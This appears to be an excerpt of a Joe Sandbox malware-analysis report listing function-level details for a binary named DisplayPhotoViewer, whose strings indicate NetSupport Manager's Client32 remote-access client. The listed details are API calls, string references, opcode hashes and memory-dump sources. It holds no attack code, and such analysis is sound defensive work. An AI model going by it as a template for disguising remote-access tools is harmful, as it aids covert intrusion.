                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 2046328329-1557312927
                                                                                                    • Opcode ID: e8248cd6bcb48f466a8afd90c449b233c883adf6989ca0a1181bc4465fe60b0b
                                                                                                    • Instruction ID: 64ed91d8d40fa0720119f1e29ddcedc02e8628b54c129b600307ea3e29a189fb
                                                                                                    • Opcode Fuzzy Hash: e8248cd6bcb48f466a8afd90c449b233c883adf6989ca0a1181bc4465fe60b0b
                                                                                                    • Instruction Fuzzy Hash: 39E01AB6610229BFD714CE99EC40ED773ADAB88354F008419F95997280D6B0E8508BA1
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(?,?,?,?), ref: 11001073
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    • m_hWnd, xrefs: 11001056
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 11001051
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 819365019-1557312927
                                                                                                    • Opcode ID: c44e849ed5a76402aeb12387f3289cd06f41ee9d37a49bec26aee02e9a5440bc
                                                                                                    • Instruction ID: 6ea8610bb597eb7edb433f4b0277e9b3fa461b8359786599f83c8a8ca8bfa3d4
                                                                                                    • Opcode Fuzzy Hash: c44e849ed5a76402aeb12387f3289cd06f41ee9d37a49bec26aee02e9a5440bc
                                                                                                    • Instruction Fuzzy Hash: E9E04F75A00219BBD710DE55EC84ED6B39DEB94354F00C419F95987240D6B0E8508BA1
                                                                                                    APIs
                                                                                                    • PostMessageA.USER32(?,?,?,?), ref: 11001103
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    • m_hWnd, xrefs: 110010E6
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110010E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 906220102-1557312927
                                                                                                    • Opcode ID: 6f08d19ed098ce162f06077876b8d221c99d3cecb7b1fddc674d2f1197713961
                                                                                                    • Instruction ID: ebf97419960a6f5fdc7535cf5b438acfbf72653b8571370129838c7334b23970
                                                                                                    • Opcode Fuzzy Hash: 6f08d19ed098ce162f06077876b8d221c99d3cecb7b1fddc674d2f1197713961
                                                                                                    • Instruction Fuzzy Hash: D8E08675A00219BFD710CE55EC45FD7B39DEB88324F00C429F91887640D6B0F8508BA1
                                                                                                    APIs
                                                                                                    • KillTimer.USER32(?,?), ref: 110153CB
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    • m_hWnd, xrefs: 110153B6
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110153B1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 2229609774-1557312927
                                                                                                    • Opcode ID: 6e9e1a2be1c6ccbce9f6560311eb969b4900f8bb35f2f23db1434ae2ae72eba7
                                                                                                    • Instruction ID: 576bd0a685884d2011e160678ac5fb98489ff94297393d631ba407f82eafea24
                                                                                                    • Opcode Fuzzy Hash: 6e9e1a2be1c6ccbce9f6560311eb969b4900f8bb35f2f23db1434ae2ae72eba7
                                                                                                    • Instruction Fuzzy Hash: 0EE08635600329ABD314DF55EC40E96F3DDEB94314F00C419FD5557740D775E9808BA1
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(00000000,00001007,00000000,00000000), ref: 110A5632
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                    • String ID: ..\ctl32\listview.cpp$m_hWnd
                                                                                                    • API String ID: 819365019-4033689453
                                                                                                    • Opcode ID: 4958384af931f1911d92bd3e4cf825b6c76d5c567494a1824f866ce1e2d544cf
                                                                                                    • Instruction ID: 205844842ca6098973196131e7e87dc79f896648075e0c62b30092f8f499040e
                                                                                                    • Opcode Fuzzy Hash: 4958384af931f1911d92bd3e4cf825b6c76d5c567494a1824f866ce1e2d544cf
                                                                                                    • Instruction Fuzzy Hash: 2CE02B32B50328BBD3109A55FC01FD6B38CE759711F008039FA8856580D7F1B440C799
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(00000000,00001008,00000000,00000000), ref: 110A5672
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                    • String ID: ..\ctl32\listview.cpp$m_hWnd
                                                                                                    • API String ID: 819365019-4033689453
                                                                                                    • Opcode ID: d8ad30e877f42191b3707af9e0ef210ce6a44fdc27b6bd52bd5cdc270ceade50
                                                                                                    • Instruction ID: a75a9d38714edc97be7e7536152d2e353e6319c865be528e508ff0e6741c2e2d
                                                                                                    • Opcode Fuzzy Hash: d8ad30e877f42191b3707af9e0ef210ce6a44fdc27b6bd52bd5cdc270ceade50
                                                                                                    • Instruction Fuzzy Hash: 08E02B31B50328BFD3109A55FC41FC2B38CA758711F00803AFA8457580D6B1B540C799
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(?,?), ref: 1100113B
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    • m_hWnd, xrefs: 11001126
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 11001121
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 1604732272-1557312927
                                                                                                    • Opcode ID: 7a769bf21f6cbbf8cd891a722b01389bbfc5092aa829b7a9318ac18a31f30692
                                                                                                    • Instruction ID: 82b6675116968cbba7431826d7f6f1639b8507741ba135374402fdd6650ddaf0
                                                                                                    • Opcode Fuzzy Hash: 7a769bf21f6cbbf8cd891a722b01389bbfc5092aa829b7a9318ac18a31f30692
                                                                                                    • Instruction Fuzzy Hash: 20D02E32A10329BBC3248A56EC00FC2F39DAB50368F00C029FA1842240E671E8408BA1
                                                                                                    APIs
                                                                                                    • KillTimer.USER32(?,?), ref: 1100102B
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    • m_hWnd, xrefs: 11001016
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 11001011
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 2229609774-1557312927
                                                                                                    • Opcode ID: 9727958a2fbe4fc63bdb410eafa06567ddba4e504227bf5d039023cf564ba0ea
                                                                                                    • Instruction ID: 15cfe6f0e6bdc94c424bf2b0d0ebbdb60de7b5ccdc8d16a94c2b26e45d928c33
                                                                                                    • Opcode Fuzzy Hash: 9727958a2fbe4fc63bdb410eafa06567ddba4e504227bf5d039023cf564ba0ea
                                                                                                    • Instruction Fuzzy Hash: 0AD05B76610329BBD320DA55EC44FD6B3DDD754365F008429F94556540D771E4808791
                                                                                                    APIs
                                                                                                    • FindWindowA.USER32(NSMClassList,00000000), ref: 1103B2DF
                                                                                                    • SendMessageA.USER32(00000000,0000065B,?,?), ref: 1103B2F7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FindMessageSendWindow
                                                                                                    • String ID: NSMClassList
                                                                                                    • API String ID: 1741975844-2474587545
                                                                                                    • Opcode ID: b0c049857ce6e48c67bf7070006a4c448b2d9710b810442ea78e2e98a851643a
                                                                                                    • Instruction ID: c494c1732d21c8edd6730b2fc9f7ac2cff8271f99dabf9b9961e5f0b5ced6cac
                                                                                                    • Opcode Fuzzy Hash: b0c049857ce6e48c67bf7070006a4c448b2d9710b810442ea78e2e98a851643a
                                                                                                    • Instruction Fuzzy Hash: EFD05E32610224BBD7105B96EC49FABBBADEF89BA6F15C055FA198B184C761D80087E0
                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(1100D6FE,?,00000000,?,1100CA2A,?), ref: 1100D489
                                                                                                    • LoadLibraryA.KERNEL32(AudioCapture.dll,?,1100CA2A,?), ref: 1100D498
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoadVersion
                                                                                                    • String ID: AudioCapture.dll
                                                                                                    • API String ID: 3209957514-2642820777
                                                                                                    • Opcode ID: ec670c1b446665b5c9905e3d33e7ab318e6a52990ef39aad6622efeb1ccbc5e4
                                                                                                    • Instruction ID: a709ae7f7c36543edd98efab2f220a2832dc2460317b7b990763dae26f3de570
                                                                                                    • Opcode Fuzzy Hash: ec670c1b446665b5c9905e3d33e7ab318e6a52990ef39aad6622efeb1ccbc5e4
                                                                                                    • Instruction Fuzzy Hash: 7DE01274E1056787F3029B79984838D72E4A780699FC184B1FD11C0948FB28D4409F31
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000000,1105011B,platformid,00000000,00000000,00000000), ref: 110150D7
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,111762E8,000000FF,?,1105060C), ref: 110150E8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateFileHandle
                                                                                                    • String ID: \\.\NSWFPDrv
                                                                                                    • API String ID: 3498533004-85019792
                                                                                                    • Opcode ID: af3aec00ff591c1261cf36fe2803e382e784f461f3e5c430c02267cb1a99150c
                                                                                                    • Instruction ID: 153877e9724d3ff66f8c063fbb054f4def75941df464311efe647e63b7f07564
                                                                                                    • Opcode Fuzzy Hash: af3aec00ff591c1261cf36fe2803e382e784f461f3e5c430c02267cb1a99150c
                                                                                                    • Instruction Fuzzy Hash: 35D0C971A021347AE27115AABC4CFCBBD09EB067B5F254660F92DE51D892544C4186F4
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _strncpy
                                                                                                    • String ID: 1000,50$1000,50
                                                                                                    • API String ID: 2961919466-2776873633
                                                                                                    • Opcode ID: d94f0d834bddf19551337efc7f67368d614e781db5f2e5917047bd9d53d0875b
                                                                                                    • Instruction ID: a1b0f5a988e2b4642303c20028dfaa754ce47f9ae0491c0127ff96aa72eaea39
                                                                                                    • Opcode Fuzzy Hash: d94f0d834bddf19551337efc7f67368d614e781db5f2e5917047bd9d53d0875b
                                                                                                    • Instruction Fuzzy Hash: 69D05EF0A5238C2AFB028A9EA800B65B7CC6B81728F014060B8A8DA250E775E950C752
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 110C994D
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
